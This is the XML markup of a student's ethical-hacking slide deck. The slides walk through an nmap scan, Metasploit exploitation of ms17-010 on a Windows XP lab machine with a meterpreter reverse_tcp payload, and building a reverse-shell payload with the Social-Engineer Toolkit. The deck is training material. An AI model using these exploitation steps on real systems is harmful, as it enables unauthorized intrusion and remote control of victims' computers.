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4660"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr>
        <p:scale>
          <a:sx n="66" d="100"/>
          <a:sy n="66" d="100"/>
        </p:scale>
        <p:origin x="110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C3712BB-C693-468A-82CC-64D2FE3C5A3A}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>10/7/2020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1008994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168234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3628712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8A3BD4A-FEBA-46C3-956F-E298A858831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15295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634386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C3712BB-C693-468A-82CC-64D2FE3C5A3A}" type="datetimeFigureOut">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3460861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C3712BB-C693-468A-82CC-64D2FE3C5A3A}" type="datetimeFigureOut">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3348674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3712BB-C693-468A-82CC-64D2FE3C5A3A}"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2483432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C3712BB-C693-468A-82CC-64D2FE3C5A3A}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>10/7/2020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3029794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3712BB-C693-468A-82CC-64D2FE3C5A3A}"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308188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C3712BB-C693-468A-82CC-64D2FE3C5A3A}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>10/7/2020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203252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2823291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3712BB-C693-468A-82CC-64D2FE3C5A3A}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>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110942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C3712BB-C693-468A-82CC-64D2FE3C5A3A}" type="datetimeFigureOut">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214650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3712BB-C693-468A-82CC-64D2FE3C5A3A}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>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2466407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131245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3712BB-C693-468A-82CC-64D2FE3C5A3A}"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3BD4A-FEBA-46C3-956F-E298A858831D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26414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3712BB-C693-468A-82CC-64D2FE3C5A3A}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>10/7/2020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A3BD4A-FEBA-46C3-956F-E298A858831D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6474375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cvedetails.com/google-search-results.php?q=ms17-010&amp;sa=Search" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.faqforge.com/windows/windows-10/how-to-allow-ping-trough-the-firewall-in-windows-10/" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/trustedsec/social-engineer-toolkit" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nmap.org/book/man.html" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.offensive-security.com/metasploit-unleashed/msfconsole-command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4800" dirty="0" smtClean="0"/>
              <a:t>Project On Ethical Hacking</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8494776" y="3805937"/>
            <a:ext cx="3209544" cy="685800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>By: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>V. Sai Nikhil (16MIS0257)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1628894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Scanning </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>the ports:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Just like a big house which has so many doors and windows to enter into every computer system has different ports to enter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -O &lt;target IP Address</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&gt;.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437632" y="2996184"/>
            <a:ext cx="5943600" cy="3718560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="47225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b="1" dirty="0"/>
              <a:t>Vulnerability Scanning:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Now that we know the details about open ports, we have to scan the vulnerability of the system.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> --script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>vuln</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> &lt;target IP address&gt;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831592"/>
            <a:ext cx="5943600" cy="3718560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="326038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507" y="621793"/>
            <a:ext cx="8611204" cy="5386134"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="101847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Project-2</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>System hacking</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>The process of gaining access to an operating system is known as system hacking. In this module, we will exploit the vulnerability of an operating system by using passive and active method.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>There are</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Passive Attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Active Attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Passive method means gaining access of system remotely.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Active method </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>means we need physical access for a certain amount of time to the operating system or we will have to use social engineering to make the payload execute at target operating system.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="193738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System Attack</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>We use Metasploit framework to perform the attack.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>From the vulnerability scan we found that the windows XP is vulnerable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>to ms17-010 or  ms08-067 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Search ms17-010</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>We get all types of attacks in detail</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="224331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6834" y="338329"/>
            <a:ext cx="9590689" cy="5998782"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="269602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We will be using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>auxiliary/scanner/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>smb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/smb_ms17_010 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>and check the OS is vulnerable to this to ms17-010</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b="11610"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2612136" y="3071624"/>
            <a:ext cx="5943600" cy="3284220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35060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b="17094"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="615524" y="722377"/>
            <a:ext cx="10404342" cy="5395278"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="78864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set RHOST &lt;target IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&gt;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b="12309"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2657856" y="2767584"/>
            <a:ext cx="5943600" cy="3261360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2565266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a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>We use exploit/windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>smb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/ms17_010_psexec to execute the payload</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>set payload </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>reverse_tcp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>show options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b="8894"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3544824" y="3145536"/>
            <a:ext cx="5943600" cy="3383280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1996042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Company</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Azure Skynet is an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>ISO 9001:2015 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>certified training and service provider company which deals in imparting superior quality of training on various technologies from different domains of IT industry.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The External </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>guide </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Manish Bhardwaj</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, Co-Founder Azure Skynet Solutions </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Pvt.Ltd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>and founder of Cosmic Skills which is an online platform for learning ethical hacking and other courses.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302" y="4620475"/>
            <a:ext cx="3238500" cy="819150"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="144884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180" y="1233861"/>
            <a:ext cx="10820400" cy="4024125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>We see the LHOST and RHOST is blank</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Type set RHOST &lt;IP address of target&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Type set LHOST &lt;IP address of attacker&gt;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b="10944"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3861121" y="2581155"/>
            <a:ext cx="6870337" cy="3822726"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="358023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b="14587"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1091124" y="682908"/>
            <a:ext cx="10317783" cy="5512182"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="327196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It will start injecting the payload in your target machine remotely. You will get </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt; that means you have successfully exploited the Windows XP machine.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Type </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sysinfo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to get the system information.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="203722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b="12766"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="718335" y="358815"/>
            <a:ext cx="10866083" cy="5928871"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="203104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998" y="416690"/>
            <a:ext cx="9608455" cy="6009894"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2348153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Active System Hacking</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In passive system hacking, we exploited the operating system without even touching the system. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>However</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, in active system hacking, we need physical access for a certain amount of time to the operating system or we will have to use social engineering to make the payload execute at target operating system</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Open terminal and type </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>setoolkit</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="312066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0365" y="937550"/>
            <a:ext cx="8257569" cy="5164942"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2883046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931" y="381965"/>
            <a:ext cx="9386390" cy="5870997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2086673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b="11171"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1409585" y="520861"/>
            <a:ext cx="9650180" cy="5361711"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="729023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Create </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>a Payload and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Listener</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Windows Meterpreter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Reverse_TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> X64     Connect back to the attacker (Windows x64), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Meterpreter</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>IP address of the attacker machine. In my case it is 192.168.248.132</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="128400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1696" y="510660"/>
            <a:ext cx="8163552" cy="5771268"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
